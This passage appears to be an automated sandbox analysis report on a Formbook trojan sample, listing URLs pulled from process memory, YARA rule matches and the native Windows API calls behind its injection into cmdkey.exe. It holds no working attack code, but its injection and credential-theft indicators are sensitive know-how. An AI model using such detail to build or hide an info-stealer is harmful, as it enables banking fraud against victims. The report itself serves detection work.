            Source: cmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/zb_system/script/zblogphp.js
            Source: cmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/zb_users/theme/yd1125free/script/common.js?v=1.2.4
            Source: cmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/zb_users/theme/yd1125free/script/custom.js?v=1.2.4
            Source: cmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/zb_users/theme/yd1125free/style/css/font-awesome.min.css
            Source: cmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/zb_users/theme/yd1125free/style/css/normalize.css
            Source: cmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/zb_users/theme/yd1125free/style/css/swiper-4.3.3.min.css
            Source: cmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/zb_users/theme/yd1125free/style/images/logo.png
            Source: cmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/zb_users/theme/yd1125free/style/style.min.css?v=1.2.4
            Source: cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.hiretemp.net/Hiring_Firm.cfm?fp=4sYsJ6hmAV92GOPbYgqhq6Pa7rFOcv%2FiQ1gUTNg2fXYprH4vjFihEX2
            Source: cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.hiretemp.net/Hiring_Staffing.cfm?fp=4sYsJ6hmAV92GOPbYgqhq6Pa7rFOcv%2FiQ1gUTNg2fXYprH4vjFi
            Source: cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.hiretemp.net/Immediate_Hiring_Employees.cfm?fp=4sYsJ6hmAV92GOPbYgqhq6Pa7rFOcv%2FiQ1gUTNg2
            Source: cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.hiretemp.net/display.cfm
            Source: cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.hiretemp.net/px.js?ch=1
            Source: cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.hiretemp.net/px.js?ch=2
            Source: cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.hiretemp.net/sk-logabpstatus.php?a=azI2OHRXUHVzMTBzQXZ5ektDRlFPdm5kMWRrSHFZcXJyR0pab3RFT2
            Source: NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003A68000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a1.html
            Source: NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003A68000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a2.html
            Source: cmdkey.exe, 00000008.00000002.3818027240.00000000041D8000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003A68000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a5.html
            Source: cmdkey.exe, 00000008.00000002.3818027240.00000000041D8000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003A68000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a6.html
            Source: cmdkey.exe, 00000008.00000002.3818027240.00000000041D8000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003A68000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a8.html
            Source: cmdkey.exe, 00000008.00000002.3818027240.00000000041D8000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003A68000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a9.html
            Source: cmdkey.exe, 00000008.00000003.1737146013.0000000007ED8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
            Source: cmdkey.exe, 00000008.00000003.1737146013.0000000007ED8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: cmdkey.exe, 00000008.00000002.3818027240.0000000004CD6000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004566000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: cmdkey.exe, 00000008.00000003.1737146013.0000000007ED8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: cmdkey.exe, 00000008.00000003.1737146013.0000000007ED8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
            Source: NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
            Source: cmdkey.exe, 00000008.00000003.1737146013.0000000007ED8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: cmdkey.exe, 00000008.00000003.1737146013.0000000007ED8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: cmdkey.exe, 00000008.00000003.1737146013.0000000007ED8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: cmdkey.exe, 00000008.00000002.3818027240.00000000049B2000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004242000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
            Source: cmdkey.exe, 00000008.00000002.3818027240.00000000041D8000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003A68000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://js.users.51.la/21851687.js
            Source: cmdkey.exe, 00000008.00000002.3814752917.0000000002F6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: cmdkey.exe, 00000008.00000002.3814752917.0000000002F6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: cmdkey.exe, 00000008.00000002.3814752917.0000000002F6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: cmdkey.exe, 00000008.00000002.3814752917.0000000002F6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=10336
            Source: cmdkey.exe, 00000008.00000002.3814752917.0000000002F6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: cmdkey.exe, 00000008.00000002.3814752917.0000000002F6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: cmdkey.exe, 00000008.00000002.3814752917.0000000002F6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: cmdkey.exe, 00000008.00000003.1728997470.0000000007EB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://support.hostgator.com/
            Source: cmdkey.exe, 00000008.00000003.1737146013.0000000007ED8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000531E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004BAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: cmdkey.exe, 00000008.00000003.1737146013.0000000007ED8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: cmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.htmlit.com.cn/
            Source: cmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.zblogcn.com/

            E-Banking Fraud

            Source: Yara matchFile source: 4.2.r9856_7.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.r9856_7.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000A.00000002.3819616771.0000000005790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3814636259.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3816875853.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1543385980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1545185374.0000000001500000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3816533297.0000000003160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1545720101.0000000002060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 4.2.r9856_7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 4.2.r9856_7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.3819616771.0000000005790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.3814636259.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.3816875853.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.1543385980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.1545185374.0000000001500000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3816533297.0000000003160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.1545720101.0000000002060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_0042C1A3 NtClose,4_2_0042C1A3
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_01122B60 NtClose,LdrInitializeThunk,4_2_01122B60
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_01122DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_01122DF0
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_01122C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_01122C70
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_011235C0 NtCreateMutant,LdrInitializeThunk,4_2_011235C0
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_01124340 NtSetContextThread,4_2_01124340
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_01124650 NtSuspendThread,4_2_01124650
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_01122B80 NtQueryInformationFile,4_2_01122B80
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_01122BA0 NtEnumerateValueKey,4_2_01122BA0
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_01122BF0 NtAllocateVirtualMemory,4_2_01122BF0
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_01122BE0 NtQueryValueKey,4_2_01122BE0
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_01122AB0 NtWaitForSingleObject,4_2_01122AB0
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_01122AD0 NtReadFile,4_2_01122AD0
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_01122AF0 NtWriteFile,4_2_01122AF0
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_01122D10 NtMapViewOfSection,4_2_01122D10
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_01122D00 NtSetInformationFile,4_2_01122D00
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_01122D30 NtUnmapViewOfSection,4_2_01122D30
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_01122DB0 NtEnumerateKey,4_2_01122DB0
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_01122DD0 NtDelayExecution,4_2_01122DD0
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_01122C00 NtQueryInformationProcess,4_2_01122C00
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_01122C60 NtCreateKey,4_2_01122C60
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_01122CA0 NtQueryInformationToken,4_2_01122CA0
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_01122CC0 NtQueryVirtualMemory,4_2_01122CC0
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_01122CF0 NtOpenProcess,4_2_01122CF0
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_01122F30 NtCreateSection,4_2_01122F30
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_01122F60 NtCreateProcessEx,4_2_01122F60
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_01122F90 NtProtectVirtualMemory,4_2_01122F90
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_01122FB0 NtResumeThread,4_2_01122FB0
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_01122FA0 NtQuerySection,4_2_01122FA0
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_01122FE0 NtCreateFile,4_2_01122FE0
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_01122E30 NtWriteVirtualMemory,4_2_01122E30
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_01122E80 NtReadVirtualMemory,4_2_01122E80
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_01122EA0 NtAdjustPrivilegesToken,4_2_01122EA0
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_01122EE0 NtQueueApcThread,4_2_01122EE0
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_01123010 NtOpenDirectoryObject,4_2_01123010
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_01123090 NtSetValueKey,4_2_01123090
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_011239B0 NtGetContextThread,4_2_011239B0
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_01123D10 NtOpenProcessToken,4_2_01123D10
            Source: C:\Users\user\Desktop\r9856_7.exe, Code function: 4_2_01123D70 NtOpenThread,4_2_01123D70
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_03514340 NtSetContextThread,LdrInitializeThunk,8_2_03514340
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_03514650 NtSuspendThread,LdrInitializeThunk,8_2_03514650
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_03512B60 NtClose,LdrInitializeThunk,8_2_03512B60
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_03512BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_03512BF0
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_03512BE0 NtQueryValueKey,LdrInitializeThunk,8_2_03512BE0
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_03512BA0 NtEnumerateValueKey,LdrInitializeThunk,8_2_03512BA0
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_03512AD0 NtReadFile,LdrInitializeThunk,8_2_03512AD0
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_03512AF0 NtWriteFile,LdrInitializeThunk,8_2_03512AF0
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_03512F30 NtCreateSection,LdrInitializeThunk,8_2_03512F30
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_03512FE0 NtCreateFile,LdrInitializeThunk,8_2_03512FE0
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_03512FB0 NtResumeThread,LdrInitializeThunk,8_2_03512FB0
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_03512EE0 NtQueueApcThread,LdrInitializeThunk,8_2_03512EE0
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_03512E80 NtReadVirtualMemory,LdrInitializeThunk,8_2_03512E80
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_03512D10 NtMapViewOfSection,LdrInitializeThunk,8_2_03512D10
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_03512D30 NtUnmapViewOfSection,LdrInitializeThunk,8_2_03512D30
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_03512DD0 NtDelayExecution,LdrInitializeThunk,8_2_03512DD0
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_03512DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_03512DF0
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_03512C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_03512C70
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_03512C60 NtCreateKey,LdrInitializeThunk,8_2_03512C60
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_03512CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_03512CA0
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_035135C0 NtCreateMutant,LdrInitializeThunk,8_2_035135C0
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_035139B0 NtGetContextThread,LdrInitializeThunk,8_2_035139B0
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_03512B80 NtQueryInformationFile,8_2_03512B80
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_03512AB0 NtWaitForSingleObject,8_2_03512AB0
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_03512F60 NtCreateProcessEx,8_2_03512F60
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_03512F90 NtProtectVirtualMemory,8_2_03512F90
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_03512FA0 NtQuerySection,8_2_03512FA0
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_03512E30 NtWriteVirtualMemory,8_2_03512E30
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_03512EA0 NtAdjustPrivilegesToken,8_2_03512EA0
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_03512D00 NtSetInformationFile,8_2_03512D00
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_03512DB0 NtEnumerateKey,8_2_03512DB0
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_03512C00 NtQueryInformationProcess,8_2_03512C00
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_03512CC0 NtQueryVirtualMemory,8_2_03512CC0
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_03512CF0 NtOpenProcess,8_2_03512CF0
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_03513010 NtOpenDirectoryObject,8_2_03513010
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_03513090 NtSetValueKey,8_2_03513090
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_03513D70 NtOpenThread,8_2_03513D70
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_03513D10 NtOpenProcessToken,8_2_03513D10
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_00A289B0 NtCreateFile,8_2_00A289B0
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_00A28B20 NtReadFile,8_2_00A28B20
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_00A28CB0 NtClose,8_2_00A28CB0
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_00A28C10 NtDeleteFile,8_2_00A28C10
            Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 8_2_00A28E20 NtAllocateVirtualMemory,8_2_00A28E20
            Source: r9856_7.exe, 00000000.00000002.1379686712.000000000118E000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameclr.dllT vs r9856_7.exe
            Source: r9856_7.exe, 00000000.00000002.1386515318.000000000417B000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameTyrone.dll8 vs r9856_7.exe
            Source: r9856_7.exe, 00000000.00000002.1389470977.0000000007610000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameTyrone.dll8 vs r9856_7.exe
            Source: r9856_7.exe, 00000000.00000002.1389160167.0000000007270000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs r9856_7.exe
            Source: r9856_7.exe, 00000000.00000002.1385826227.0000000003081000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs r9856_7.exe
            Source: r9856_7.exe, 00000000.00000000.1347472696.0000000000D30000.00000002.00000001.01000000.00000003.sdmp, Binary or memory string: OriginalFilenamedjdH.exeN vs r9856_7.exe
            Source: r9856_7.exe, 00000004.00000002.1544042042.00000000011DD000.00000040.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs r9856_7.exe
            Source: r9856_7.exe, 00000004.00000002.1543682114.0000000000B78000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamecmdkey.exej% vs r9856_7.exe
            Source: r9856_7.exe, 00000004.00000002.1543682114.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamecmdkey.exej% vs r9856_7.exe
            Source: r9856_7.exe, Binary or memory string: OriginalFilenamedjdH.exeN vs r9856_7.exe
            Source: r9856_7.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 4.2.r9856_7.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 4.2.r9856_7.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000A.00000002.3819616771.0000000005790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
